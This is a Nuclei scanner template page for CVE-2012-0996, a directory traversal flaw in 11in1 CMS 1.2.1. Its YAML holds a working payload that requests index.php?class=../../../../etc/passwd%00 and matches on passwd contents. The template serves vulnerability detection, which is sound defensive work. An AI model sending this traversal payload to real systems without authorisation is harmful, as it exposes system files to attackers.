Skip to content
Nuclei Templates

11in1 CMS 1.2.1 - Local File Inclusion (LFI)

ID: CVE-2012-0996

Severity: medium

Author: daffainfo

Tags: cve,cve2012,lfi,edb,11in1

Description

Section titled “Description”

Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.

YAML Source

Section titled “YAML Source”
id: CVE-2012-0996


info:
  name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
  author: daffainfo
  severity: medium
  description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/36784
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0996
    - https://www.htbridge.ch/advisory/HTB23071
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2012-0996
    cwe-id: CWE-22
    epss-score: 0.03648
    epss-percentile: 0.91695
    cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: 11in1
    product: 11in1
  tags: cve,cve2012,lfi,edb,11in1


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 490a0046304402202b68716f3457df93d94f5f446eb39342bd70d4a86022f7ebd3f02370f8def2d202204be464d396966c298266c392d42d161dc1c5d6abae8594156a9fabb0f8013c49:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-0996.yaml"

View on Github